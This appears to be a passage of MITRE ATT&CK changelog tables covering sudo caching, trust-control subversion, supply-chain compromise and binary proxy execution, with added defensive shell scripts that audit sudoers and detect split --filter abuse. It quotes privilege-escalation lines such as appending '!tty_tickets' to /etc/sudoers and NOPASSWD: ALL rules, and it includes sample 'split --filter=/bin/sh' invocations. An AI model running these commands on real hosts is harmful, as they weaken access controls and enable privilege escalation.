| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-02 15:17:40.505000+00:00 | 2022-04-19 23:03:49.461000+00:00 |
| description | Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| external_references[1]['source_name'] | FireEye APT38 Oct 2018 | DOJ Lazarus Sony 2018 |
| external_references[1]['description'] | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. |
| external_references[1]['url'] | https://content.fireeye.com/apt/rpt-apt38 | https://www.justice.gov/opa/press-release/file/1092091/download |
| external_references[2]['source_name'] | DOJ Lazarus Sony 2018 | FireEye APT38 Oct 2018 |
| external_references[2]['description'] | Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019. | FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. |
| external_references[2]['url'] | https://www.justice.gov/opa/press-release/file/1092091/download | https://content.fireeye.com/apt/rpt-apt38 |
| x_mitre_data_sources[1] | File: File Deletion | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | File: File Deletion |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site. Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:18:32.225000+00:00 | 2022-05-05 05:04:52.387000+00:00 |
| external_references[1]['source_name'] | SpectorOps Subverting Trust Sept 2017 | SpectorOps Code Signing Dec 2017 |
| external_references[1]['description'] | Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018. | Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018. |
| external_references[1]['url'] | https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf | https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec |
| external_references[2]['source_name'] | Securelist Digital Certificates | SpectorOps Subverting Trust Sept 2017 |
| external_references[2]['description'] | Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016. | Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018. |
| external_references[2]['url'] | https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/ | https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf |
| external_references[3]['source_name'] | Symantec Digital Certificates | Securelist Digital Certificates |
| external_references[3]['description'] | Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. | Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016. |
| external_references[3]['url'] | http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates | https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/ |
| external_references[4]['source_name'] | SpectorOps Code Signing Dec 2017 | Symantec Digital Certificates |
| external_references[4]['description'] | Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018. | Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016. |
| external_references[4]['url'] | https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec | http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Creation | Module: Module Load |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | File: File Metadata |
| x_mitre_data_sources[2] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[4] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[6] | Module: Module Load | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control | |
| x_mitre_defense_bypassed | Process whitelisting |
| Old Description | New Description |
|---|---|
Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. 
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additionally, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo 'Defaults !tty_tickets' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
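The description above (and its repeat in the STIX field table below) names three sudoers settings that make the credential cache abusable: a long timestamp_timeout, !tty_tickets, and NOPASSWD rules. The script below is an added example, not code from the ATT&CK entry or from the cited malware reports, that audits a sudoers file for exactly those settings. The sudoers content is a constructed sample written to a temp file; on a real host you would point audit_sudoers at /etc/sudoers (and, as the comment notes, recurse into /etc/sudoers.d, which this demo does not). The cache_is_live function is the read-only check an attacker or a tester would run to learn whether a timestamp is currently valid; it is defined but not called because it needs sudo on the box.

```shell
#!/bin/sh
# Added example, not from the ATT&CK entry: audit a sudoers file for the three
# settings the Sudo and Sudo Caching technique relies on. The sudoers content
# below is constructed for the demo, not a real host's file.

SAMPLE_SUDOERS="$(mktemp)"
trap 'rm -f "$SAMPLE_SUDOERS"' EXIT
cat > "$SAMPLE_SUDOERS" <<'EOF'
# constructed sample
Defaults        env_reset
Defaults        timestamp_timeout=60
Defaults        !tty_tickets
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
user1   ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
EOF

# audit_sudoers FILE: print one line per risky setting found in FILE.
# Comments are stripped first so a commented-out "!tty_tickets" is not a
# finding. That also drops #include/#includedir lines: a real audit must
# recurse into /etc/sudoers.d, which this demo does not.
audit_sudoers() {
    body=$(sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1")

    # tty_tickets off: one cached timestamp serves every tty of that user
    if printf '%s\n' "$body" | grep -Eq '^[[:space:]]*Defaults[^=]*![[:space:]]*tty_tickets'; then
        echo "tty_tickets disabled: cached credentials are valid from any tty"
    fi

    # timestamp_timeout: minutes the cache lives; 0 means always prompt,
    # a negative value means never expire (the sudo default is 5)
    to=$(printf '%s\n' "$body" \
        | sed -n 's/.*timestamp_timeout[[:space:]]*=[[:space:]]*\(-\{0,1\}[0-9][0-9.]*\).*/\1/p' \
        | tail -n 1)
    if [ -n "$to" ] && awk -v t="$to" 'BEGIN { exit !(t < 0 || t > 5) }'; then
        echo "timestamp_timeout=$to: credential cache outlives the 5-minute default"
    fi

    # NOPASSWD rules need no cache at all; "NOPASSWD: ALL" is the worst case
    printf '%s\n' "$body" | grep -E 'NOPASSWD:' | while IFS= read -r rule; do
        case "$rule" in
            *"NOPASSWD: ALL"*|*"NOPASSWD:ALL"*) echo "NOPASSWD for all commands: $rule" ;;
            *) echo "NOPASSWD rule: $rule" ;;
        esac
    done
}

# count_findings FILE: number of findings, usable as a metric or exit status.
count_findings() {
    audit_sudoers "$1" | grep -c .
}

# cache_is_live: the check malware makes before relying on the cache. sudo -n
# never prompts; it succeeds only if a valid timestamp already exists for this
# user (and, with tty_tickets on, for this tty). Not run in the demo.
cache_is_live() {
    sudo -n true 2>/dev/null
}

audit_sudoers "$SAMPLE_SUDOERS"
```

Against the sample this reports four findings: tty_tickets disabled, a 60-minute timeout, and the two NOPASSWD rules. Note that any successful sudo, including `sudo -n true`, refreshes the timestamp, so the liveness check itself extends the window it measures.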
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 01:03:26.306000+00:00 | 2022-03-14 16:28:19.781000+00:00 |
| description | Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additionally, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo 'Defaults !tty_tickets' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additionally, if tty_tickets is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo 'Defaults !tty_tickets' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. |
| x_mitre_data_sources[0] | Process: Process Metadata | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Metadata |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 
Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['File: File Metadata', 'Sensor Health: Host Status'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018. | |
| external_references | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | |
| external_references | IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019. | |
| external_references | CAPEC-437 | |
| external_references | CAPEC-438 | |
| external_references | CAPEC-439 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-437 | |
| external_references | CAPEC-438 | |
| external_references | CAPEC-439 | |
| external_references | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | |
| external_references | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | |
| external_references | Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-01-06 19:32:28.382000+00:00 | 2022-04-28 16:03:22.870000+00:00 |
| description | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) | Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. 
Supply chain compromise can take place at any stage of the supply chain including: * Manipulation of development tools * Manipulation of a development environment * Manipulation of source code repositories (public or private) * Manipulation of source code in open-source dependencies * Manipulation of software update/distribution mechanisms * Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware) * Replacement of legitimate software with modified versions * Sales of modified/counterfeit products to legitimate distributors * Shipment interdiction While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) |
| external_references[1]['source_name'] | capec | Avast CCleaner3 2018 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/437.html | https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities |
| external_references[2]['source_name'] | capec | Command Five SK 2011 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/438.html | https://www.commandfive.com/papers/C5_APT_SKHack.pdf |
| external_references[3]['source_name'] | capec | IBM Storwize |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/439.html | https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E |
| external_references[4]['source_name'] | IBM Storwize | Symantec Elderwood Sept 2012 |
| external_references[4]['description'] | IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. |
| external_references[4]['url'] | https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028-_-OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206-_-E | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| external_references[6]['source_name'] | Avast CCleaner3 2018 | Trendmicro NPM Compromise |
| external_references[6]['description'] | Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018. | Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. |
| external_references[6]['url'] | https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities | https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets |
| external_references[8]['source_name'] | Command Five SK 2011 | capec |
| external_references[8]['url'] | https://www.commandfive.com/papers/C5_APT_SKHack.pdf | https://capec.mitre.org/data/definitions/437.html |
| external_references[9]['source_name'] | Symantec Elderwood Sept 2012 | capec |
| external_references[9]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://capec.mitre.org/data/definitions/438.html |
| external_references[10]['source_name'] | Trendmicro NPM Compromise | capec |
| external_references[10]['url'] | https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets | https://capec.mitre.org/data/definitions/439.html |
| x_mitre_version | 1.2 | 1.5 |
| Old Description | New Description |
|---|---|
| Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) |
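The new description's Linux example is GNU split, whose --filter=COMMAND option runs COMMAND through the shell for every output chunk, so a trusted coreutils binary ends up spawning an arbitrary command. The script below is an added detection example, not code from the ATT&CK entry, GTFOBins or the split man page: it scans a process-creation log for split invocations that carry --filter and reports the command being proxied. The log is a constructed tab-separated sample (timestamp, user, pid, command line); arguments are split on whitespace, which is enough for the demo but loses quoted arguments, a problem EXECVE-style records that carry argv as separate fields do not have.

```shell
#!/bin/sh
# Added example, not from the ATT&CK entry or GTFOBins: flag GNU split invoked
# with --filter, the option that makes it run a shell command per chunk.
# The process log is constructed for the demo (tab-separated fields:
# timestamp, user, pid, command line).

SAMPLE_PROC_LOG="$(mktemp)"
trap 'rm -f "$SAMPLE_PROC_LOG"' EXIT
{
  printf '%s\t%s\t%s\t%s\n' 2022-04-18T14:52:08Z alice    4021 'split -l 1000 big.csv part_'
  printf '%s\t%s\t%s\t%s\n' 2022-04-18T14:52:09Z www-data 4022 'split --filter=/bin/sh /dev/stdin'
  printf '%s\t%s\t%s\t%s\n' 2022-04-18T14:52:10Z www-data 4023 '/usr/bin/split -b 1k --filter /bin/bash /dev/null'
  printf '%s\t%s\t%s\t%s\n' 2022-04-18T14:52:11Z bob      4024 'grep --filter=x notes.txt'
} > "$SAMPLE_PROC_LOG"

# detect_split_filter LOG: print "pid<TAB>user<TAB>filter command" for each
# split process whose arguments carry --filter=CMD or --filter CMD. Ordinary
# split runs (no --filter) and other binaries are ignored; the path prefix is
# stripped so /usr/bin/split and split match alike.
detect_split_filter() {
    awk -F'\t' '
    {
        n = split($4, argv, /[ \t]+/)
        base = argv[1]; sub(/.*\//, "", base)
        if (base != "split") next
        filt = ""
        for (i = 2; i <= n; i++) {
            if (argv[i] ~ /^--filter=/)              filt = substr(argv[i], 10)
            else if (argv[i] == "--filter" && i < n) filt = argv[i + 1]
        }
        if (filt != "") printf "%s\t%s\t%s\n", $3, $2, filt
    }' "$1"
}

detect_split_filter "$SAMPLE_PROC_LOG"
```

On the sample this flags pids 4022 and 4023 (both running as www-data, proxying /bin/sh and /bin/bash) and stays silent on the legitimate split and on grep, whose --filter is unrelated. Pairing the match with the parent process (a web server or cron spawning split --filter is far more suspicious than an interactive shell) is the natural next filter in a real pipeline.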
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 00:13:19.412000+00:00 | 2022-04-18 14:52:08.678000+00:00 |
| name | Signed Binary Proxy Execution | System Binary Proxy Execution |
| description | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. | Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) |
| x_mitre_data_sources[0] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | File: File Creation | Command: Command Execution |
